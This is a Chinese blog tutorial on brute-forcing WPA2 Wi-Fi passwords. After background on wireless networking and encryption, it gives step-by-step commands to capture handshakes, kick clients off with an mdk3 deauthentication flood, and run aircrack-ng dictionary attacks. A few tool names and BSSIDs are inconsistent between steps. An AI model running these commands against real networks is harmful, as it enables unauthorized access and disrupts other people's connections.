无线网络密码爆破

无线网络密码爆破

1.无线网络:

  • 无线网络的组成:
    • 通常情况下,无线网络是由路由器和无线客户端组成的。我们通常称路由器为AP(Access Point,接入点);无线客户端为STA(Station)。
    • 在一个无线网络中至少有一个AP和一个或多个STA。
  • 无线网络的工作流程:
    1. 因为AP自动广播SSID,所以STA可监听AP发出的信号。当STA加入无线网络时,会发送一个探测请求。当AP收到请求时,回应一个含频带信息的相应包。之后,STA切换到指定频道。
    2. STA提供密码认证该无线网络。当AP验证STA提交的认证信息正确后,便允许STA接入无线网络。
    3. STA与AP建立关联:STA与AP之间协商传输速率,直至关联成功。一个STA同时只能与一个AP关联。

2.网卡的工作模式:

  • 被管理模式(Manage mode):当无线客户端直接与无线接入点(WAP)连接时,使用这个模式。在这个模式中,无线网卡的驱动程序依靠WAP管理整个通信过程。
  • Ad hoc模式:点对点模式。当用户的网络由相互直连的设备组成时,使用这个模式。在这个模式中,无线通信的双方共同承担WAP的职责。
  • 主模式(master mode):这个模式允许无线网卡作为其他设备的AP。
  • 监听模式:用于监听网络中所有的数据包。

3.WEP/WPA/WPA2:

  • WEP是Wired Equivalent Privacy的简称,有线等效保密(WEP)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络。不过密码分析学家已经找出 WEP 好几个弱点,因此在2003年被 Wi-Fi Protected Access (WPA) 淘汰,又在2004年由完整的 IEEE 802.11i 标准(又称为 WPA2)所取代。
  • WPA全名为Wi-Fi Protected Access,有WPA和WPA2两个标准,是一种保护无线电脑网络(Wi-Fi)安全的系统,它是应研究者在前一代的系统有线等效加密(WEP)中找到的几个严重的弱点而产生的。WPA实作了IEEE 802.11i标准的大部分,是在802.11i完备之前替代WEP的过渡方案。WPA的设计可以用在所有的无线网卡上,但未必能用在第一代的无线取用点上。

4.无线网络密码攻击(针对WPA2):

  • sudo airmon-ng check kill
    

    无线网络密码爆破_第1张图片

    此命令用于结束可能干扰aircrack工具集的进程。

  • sudo airmon-ng start wlan0
    

    无线网络密码爆破_第2张图片

    开启无线网卡的监控模式,执行成功之后网卡接口变为wlan0mon,可以使用ifconfig命令查看。

  • sudo airodump-ng wlan0mon
    

    此命令用于监听无线网络。其中

    • BSSID:表示无线AP的MAC地址。

    • PWR:网卡报告的信号水平,信号值越高,离AP越近。

    • Beacons:无线AP发送的通告编号。

    • #Data:被捕获到的数据分组的数量。

    • #/s:10s内每秒捕获数据分组的数量。

    • CH:信道号。

    • MB:无线AP支持的最大速率。

    • ENC:使用的加密算法体系。

    • CIPHER:检查到的加密算法。

    • AUTH:使用的认证协议。

    • ESSID:SSID号(图中一看就知道是啥)。

    • STATION:客户端的MAC地址。

    • Rate:传输率。

    • Lost:过去10s中内丢失的数据分组。

    • Frames:客户端发送的数据分组数量。

    • Probe:被客户探查的ESSID,如果客户端正在连接一个AP,但没连接上,就会显示在这里。

  • sudo airodump-ng -c 3 --bssid 48:8A:D2:C8:F6:42 -w /home/ronie/ wlan0mon
    

    无线网络密码爆破_第3张图片

    -c:信道。 --bssid:无线AP的MAC地址。-w:捕获到的握手包的存放目录。

    执行此命令后,等待程序捕获握手包。但是聪明的黑客是不会等待的。

  • sudo mdk3 wlan0mon d -s 100 -c 3
    

    给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。执行完命令后,等待捕获握手包。

    无线网络密码爆破_第4张图片

    -s:发送包的时间间隔,d:表示死亡攻击,-c:攻击信道

  • sudo airmon stop wlan0mon
    

    关闭网卡的监听模式

  • sudo aircrack-ng -a2 -b 0C:D8:6C:8C:34:98 -w /home/ronie/桌面/crunch.txt /home/ronie/*.cap
    

    无线网络密码爆破_第5张图片

    -a2:WPA的握手包,-b:指定要破解的wifi BSSID,-w:指定字典文件,最后是抓取的包。

    显然我的字典里没有这个WiFi的密码。

字典生成:

  • 可以使用crunch工具生成字典。

  • Usage: crunch   [options]
    

你可能感兴趣的:(wifi,安全,linux)